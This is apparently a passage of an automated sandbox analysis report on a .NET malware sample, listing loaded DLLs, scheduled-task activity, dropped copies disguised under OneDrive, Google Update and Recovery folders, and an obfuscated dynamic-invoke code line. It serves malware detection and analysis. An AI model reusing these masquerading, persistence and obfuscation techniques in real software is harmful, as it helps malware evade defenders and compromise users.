                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\StartMenuExperienceHost.exe "C:\Recovery\StartMenuExperienceHost.exe"
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: version.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: rasapi32.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: rtutils.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: mmdevapi.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: devobj.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: ksuser.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: avrt.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: audioses.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: msacm32.dllJump to behavior
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeSection loaded: midimap.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: apphelp.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: apphelp.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: version.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: wldp.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: profapi.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: version.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: wldp.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: profapi.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: version.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: wldp.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: profapi.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\StartMenuExperienceHost.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                              Source: 0JLWNg4Sz1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: 0JLWNg4Sz1.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                              Source: 0JLWNg4Sz1.exeStatic file information: File size 1688064 > 1048576
                              Source: 0JLWNg4Sz1.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x19ba00
                              Source: 0JLWNg4Sz1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                              Data Obfuscation

                              barindex
                              .NET source code contains method to dynamically call methods (often used by packers)
                              Source: 0JLWNg4Sz1.exe, Qs2EjnxoMOtvc9JmZIW.cs.Net Code: Type.GetTypeFromHandle(WwK3d2aiJO0tV2nA8Ro.ST5mIdcdDJI(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(WwK3d2aiJO0tV2nA8Ro.ST5mIdcdDJI(16777245)),Type.GetTypeFromHandle(WwK3d2aiJO0tV2nA8Ro.ST5mIdcdDJI(16777259))})
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeCode function: 0_2_00007FFD9B7700BD pushad ; iretd 0_2_00007FFD9B7700C1
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeCode function: 0_2_00007FFD9B8D2ECA push esi; ret 0_2_00007FFD9B8D2ECB
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeCode function: 6_2_00007FFD9B7800BD pushad ; iretd 6_2_00007FFD9B7800C1
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeCode function: 6_2_00007FFD9B7A86E7 push ebp; ret 6_2_00007FFD9B7A86E8
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeCode function: 6_2_00007FFD9B7B8167 push ebx; ret 6_2_00007FFD9B7B816A
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeCode function: 6_2_00007FFD9B8F60EC push ds; retf 6_2_00007FFD9B8F60EF
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeCode function: 6_2_00007FFD9B8E2ECA push esi; ret 6_2_00007FFD9B8E2ECB
